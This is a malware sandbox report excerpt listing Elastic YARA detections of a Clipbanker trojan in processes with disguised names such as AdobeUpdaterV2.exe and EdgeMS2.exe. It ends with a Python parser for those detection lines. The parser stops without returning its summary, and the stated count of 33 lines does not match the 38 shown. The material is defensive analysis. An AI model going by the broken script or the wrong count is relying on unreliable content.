Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 26.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001C.00000002.2550324003.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001C.00000002.2550324003.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000016.00000002.2249704079.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000016.00000002.2249704079.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000E.00000002.4443460598.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.4443460598.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000007.00000002.2188753837.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000007.00000002.2188753837.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000019.00000002.2385333464.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000019.00000002.2385333464.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000015.00000002.2242821853.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000015.00000002.2242821853.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000008.00000002.2208828961.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000008.00000002.2208828961.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001D.00000002.2631140407.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001D.00000002.2631140407.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001A.00000002.2465095851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001A.00000002.2465095851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2250105459.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000017.00000002.2250105459.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000B.00000002.2205175531.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.2205175531.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000018.00000002.2305505558.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000018.00000002.2305505558.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
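The 33 "Matched rule" lines above boil down to two Elastic rules firing across a handful of processes, with every memory dump naming its process by a hex index (0000001C is process 28, the same AdobeUpdaterV2.exe whose unpacked PE is listed as 28.2.AdobeUpdaterV2.exe.400000.0.unpack). The following is an added example, not part of the report and not Joe Sandbox or Elastic tooling, that parses lines in this layout and collapses them into a rule-to-process summary. SAMPLE_LINES are seven of this section's own lines copied verbatim; the regexes encode this example's reading of the artifact naming convention (proc.run.image.base.n.unpack and proc-hex.run-hex.id.base-hex....sdmp), which is an assumption about the report format rather than something the report documents.

```python
"""Collapse a sandbox report's YARA hit lines into a per-rule, per-process summary.

Added example; not part of the Joe Sandbox report and not vendor tooling. The regexes
assume the line layout seen above (Source: <artifact>, type: <kind> Matched rule:
<name> <key = value, ...>) and the artifact naming conventions visible in it.
"""
import re

# Constructed sample: seven of the report's own 'Matched rule' lines, copied verbatim.
SAMPLE_LINES = [
    "Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09",
    "Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09",
    "Source: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09",
    "Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09",
    "Source: 0000001C.00000002.2550324003.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09",
    "Source: 0000000E.00000002.4443460598.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09",
    "Source: 00000007.00000002.2188753837.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09",
]

LINE_RE = re.compile(r"^Source:\s+(?P<source>\S+),\s+type:\s+(?P<type>\S+)\s+Matched rule:\s+(?P<rule>\S+)\s+(?P<meta>.*)$")
# key = value pairs; the lookahead keeps 'scan_context = file, memory' (a value with a comma) intact.
META_RE = re.compile(r"(\w+) = (.*?)(?=, \w+ = |$)")
# Assumed naming: <proc>.<run>.<image>.<base hex>.<n>.unpack
UNPACK_RE = re.compile(r"^(?P<proc>\d+)\.(?P<run>\d+)\.(?P<image>.+?)\.(?P<base>[0-9a-fA-F]+)\.\d+\.unpack$")
# Assumed naming: <proc hex8>.<run hex8>.<dump id>.<base hex16>.<flags...>.sdmp
MEM_RE = re.compile(r"^(?P<proc>[0-9a-fA-F]{8})\.(?P<run>[0-9a-fA-F]{8})\.\d+\.(?P<base>[0-9a-fA-F]{16})\.(?:[0-9a-fA-F]{8}\.)+sdmp$")


def parse_source(source, kind):
    """Map an artifact name to (process index, run, image name or None, base address)."""
    if kind == "UNPACKEDPE":
        m = UNPACK_RE.match(source)
        if m:
            return int(m["proc"]), int(m["run"]), m["image"], int(m["base"], 16)
    elif kind == "MEMORY":
        m = MEM_RE.match(source)
        if m:
            return int(m["proc"], 16), int(m["run"], 16), None, int(m["base"], 16)
    return None


def parse_line(line):
    """Parse one 'Matched rule' line into a flat record, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src = parse_source(m["source"], m["type"])
    if src is None:
        return None
    meta = dict(META_RE.findall(m["meta"]))
    proc, run, image, base = src
    return {"proc": proc, "run": run, "image": image, "base": base, "kind": m["type"],
            "rule": m["rule"], "rule_id": meta.get("id"), "fingerprint": meta.get("fingerprint"),
            "threat": meta.get("threat_name"), "scan_context": meta.get("scan_context")}


def summarize(lines):
    """Group hits by rule and resolve memory-dump process indices to image names."""
    records = [r for r in map(parse_line, lines) if r]
    images = {r["proc"]: r["image"] for r in records if r["image"]}
    rules = {}
    for r in records:
        entry = rules.setdefault(r["rule"], {"id": r["rule_id"], "threat": r["threat"],
                                             "fingerprint": r["fingerprint"], "procs": set()})
        entry["procs"].add(r["proc"])
    for entry in rules.values():
        entry["procs"] = sorted(entry["procs"])
    # Processes seen only in memory dumps, with no .unpack line to name them.
    unresolved = sorted({r["proc"] for r in records} - set(images))
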